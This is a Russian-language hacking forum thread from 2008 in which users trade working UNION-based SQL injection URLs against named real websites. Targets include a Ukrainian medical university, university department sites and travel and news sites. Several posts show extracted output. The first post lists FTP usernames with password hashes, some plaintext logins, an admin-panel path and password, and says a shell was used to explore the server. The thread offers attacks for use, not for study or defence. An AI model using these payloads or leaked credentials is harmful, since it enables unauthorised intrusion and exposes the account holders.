Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.08.2008, 04:30
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Премного извинюсь, ибо в бояне есть http://odmu.edu.ua
Если господа модераторы сочтут, что данный пост есть зло - честно обзусь моментально удалить.
Дело в том, что по поиску не нашел описания хека данного ресурса. Вдобавок есть куча смежных поддоменов к данному сайту. В общем раскрутил - если что - удалю...
http://odmu.edu.ua/index.php?v=-1+union+select+1,2,concat(username,0x3a3a,password ),4,5,6+from+proftpd.users+limit+0,100/* Выборка по ftp юзерам
osas:::Z5ESqlRtTrt7Y
anatomka:::Pgwl.XrN4bs1o
phosas:::KGt4CWj1zvBWc
osasod:::JO96GZfMHu0BU
adminweb:::MEDINedu
sopott:::M.NEksFkXBxfk
admfoto::WJc7OVOTQRkFs
userfoto::RsRvTv93
biophys:::gjtqJLxY0FDrM
ftp://217.146.249.35 <-тыкаем сюда
--------------------------------
пример: login: biophys pass: gjtqJLxY0FDrM
http://www.biophys.odmu.od.ua/
login: adminweb pass: MEDINedu
ftp://www.odmu.edu.ua/
http://www.odmu.edu.ua/_.php <-админка
Пароль: k.,bvfz ie,rf
С помощью шела путешествуем по серверу на котором висит все это чудо.
|
|
|
18.08.2008, 09:52
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
|
|
|
|
18.08.2008, 10:12
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Сообщение от Glazz
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
4.1.22-standard:lyapis_lyapis:lyapis_lyapis@localhost
4
5
|
|
|
|
18.08.2008, 11:22
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Код:
http://fiske.colorado.edu/staff/index.php?id=-2+union+select+1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8+from+INFORMATION_SCHEMA.tables+limit+17,1/*
|
|
|
|
18.08.2008, 13:12
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Академия Наса.. )))
http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>' ,middlename,0x3a3a,login,0x3a3a,password,0x3a3a,pa ssword_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/*
Выборка по юзерам.
http://www.nasa-academy.org/db/login.php аутентификация
Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш?
К тому же походу file_priv разрешены, но пути х** нарыл...
|
|
|
|
18.08.2008, 15:46
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
www.mirtravel.com
Код:
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_name)+FROM+information_schema.columns/*
Код:
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/*
mir:4b53ed9250ece8ed
admin:e1eba9bbbb04da14e0f0b1cec9eea708: zzz123
Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/ 
Последний раз редактировалось Ponchik; 18.08.2008 в 16:01..
|
|
|
|
18.08.2008, 17:20
|
|
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600
Репутация:
850
|
|
Сообщение от S0ulVortex
http://www.grand-elizaveta.ru/otziv/?action=showreplies&fid=1&topic=1&start=-1
Народ похоже на order by незнаю как раскрутить  1 рас встречаюсь стакой Что значит похоже на ордер бай? order by ето оператор он не пожет быть похож или нет... он в вводить при правильном значении..... а так если подставить кавычку там скули нет... там про100 ошибка обращения.
|
|
|
|
18.08.2008, 18:24
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.aei-brookings.org/events/page.php?id=-152+union+select+1,2,version()/*
version: 4.0.25-standard-log
database: aei_brooking
user: aei_brookings@10.225.135.70
http://aviation-safety.net/wikibase/wiki.php?id=-16509+union+select+1,version(),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2/*
version:mysql-s-22-4.1. ???
http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,5,version()/*
version: MySQL 4.0.16
http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,TABLE_SCHEMA,COLUMN_NAME, 8,9,0,1,2,3,4,5,6,7,8,9+from+information_schema.CO LUMNS+WHERE+TABLE_NAME=%22users%22+limit+26,1/*
version: MySQL 5.0.27-standard
http://www.coinsportal.ru/Bibliotheka/Article.php?ID=-1+union+select+1,2,version(),4,5/*
version:MySQL 4.0.18
|
|
|
|
19.08.2008, 01:14
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.roguegovernment.com/news.php?id=9770+union+select+1,version(),3,4,5,6, 7,8,9,0/*
версия:mysql4.1.22-standard
выод между тегами title
PR: 5
|
|
|
|
19.08.2008, 09:49
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.vdv.gcg.ru/forum/index.php?id=-2304+union+select+concat_ws(0x3a,version(),user(), database())--
http://www.iclogic.com/catalogue/organisations/showorg.php?id=-1372+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
edited: http://www.aktem.ru/frame.php?action=book&ID=-1111+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8--
Версии 4.*
Последний раз редактировалось Calcutta; 19.08.2008 в 10:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
